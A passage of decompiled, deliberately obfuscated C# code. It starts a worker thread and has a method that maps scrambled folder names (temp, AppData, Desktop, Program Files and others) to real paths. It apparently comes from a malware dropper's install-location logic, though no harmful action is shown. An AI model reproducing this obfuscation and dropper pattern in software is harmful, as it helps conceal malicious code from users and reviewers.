thread.SetApartmentState(ApartmentState.STA);
thread.Start((object) Amqk5npffix20x5qn5x2vnb3b);
thread.Join();
}
catch
{
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = false;
}
}
private string yti5olupwaivlclet(string Ibpa121djgybg55fkysgepjc0y2qiasb2)
{
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("ApiainPtplcto ah"))
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Application.StartupPath + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Tmep"))
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Path.GetTempPath();
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("ApaapDt"))
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("M ouetyDcmns"))
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Dstpeko"))
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ue rflsrPoie"))
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("UEPOIESRRFL")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("PormFlsrga ie"))
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
return Ibpa121djgybg55fkysgepjc0y2qiasb2;
}
}
}